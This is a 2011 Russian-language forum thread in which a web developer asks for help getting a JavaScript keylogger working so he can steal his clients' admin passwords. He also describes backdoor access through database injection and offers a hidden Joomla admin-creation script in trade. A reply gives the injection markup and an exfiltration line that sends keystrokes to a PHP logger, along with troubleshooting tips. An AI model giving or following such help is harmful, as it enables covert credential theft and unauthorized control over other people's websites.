Кейлогер на JS

Discussion in 'PHP' started by cvip, 6 Dec 2011.

  1. cvip

    cvip Banned

    Joined:
    4 Dec 2007
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    Всем привет. Давненько не заходил. Но вот появился повод.
    Занимаюсь созданием сайтов и порядком надоело бороться с клиентами, поэтому разработал комплексную защиту от кидалова. Проще говоря пакет скриптов, раздающих возможность входа в админку, управление ftp и MySQL.
    Когда - то отказался от изучения JS, сейчас нет времени на это. Полный доступ я получаю через injection в базу своего аккаунта к админке. Но иногда назревают такие ситуации, когда клиент меняет хостера и возможность контролить его на 100% пропадает.
    Для того, чтобы решить эту проблему необходимо знать его реквизиты доступа в админку (частенько пароли клиенты не меняют, поэтому есть смысл ограничиться именно сбором, ибо грамотный админ не даст по тупому пройти).
    В итоге идельным решением стал кейлогер на JS. Но ни инфы, ни примеров в сети не нашел. За исключением вот этого http://www.hackzone.ru/forum/open/id/17441/

    Но записанный код не пашет, как ни крути. В чем дело я не в курсе.

    В связи с чем очень большая просьба помочь с решением проблемы.

    З.Ы. - в ответку могу предложить скрипт на php, который создает и удаляет админа в Joomla через GET переменные. Сам берет все данные для подключения к базе и выполнения запросов. Удаляет, чтобы не палить присутствие.
     
  2. daniel777

    daniel777 Elder - Старейшина

    Joined:
    8 Jul 2010
    Messages:
    517
    Likes Received:
    90
    Reputations:
    37
    У меня код с того сайта заработал.
    Тот, который в архиве - не пробовал.

    Правильно вставлял на страницу код?Надо так:

    <script type="text/javascript"> тут js </script>

    Еще должен быть правильно прописан путь к РНР файлу, который сохраняет всё в лог:

    new Image().src = 'test.php?keys='+keys; //в этой строчке пишем путь к файлу

    З.Ы. в такие скрипты нужно добавлять защиту.
     
  3. cvip

    cvip Banned

    Joined:
    4 Dec 2007
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    Вписал все правильно, 1:1, все выровнял, но пойду проверю еще раз.
    О какой защите идет речь?
     
  4. daniel777

    daniel777 Elder - Старейшина

    Joined:
    8 Jul 2010
    Messages:
    517
    Likes Received:
    90
    Reputations:
    37
    Например постоянным обращением к файлу test.php можно сделать лог файл обьемом пару гигабайт.
    А еще если не использовать функцию flock() то можно вызвать ошибку.
     
  5. Drunken Master

    Drunken Master New Member

    Joined:
    19 Nov 2007
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Скрипт работает, но только с английской раскладкой.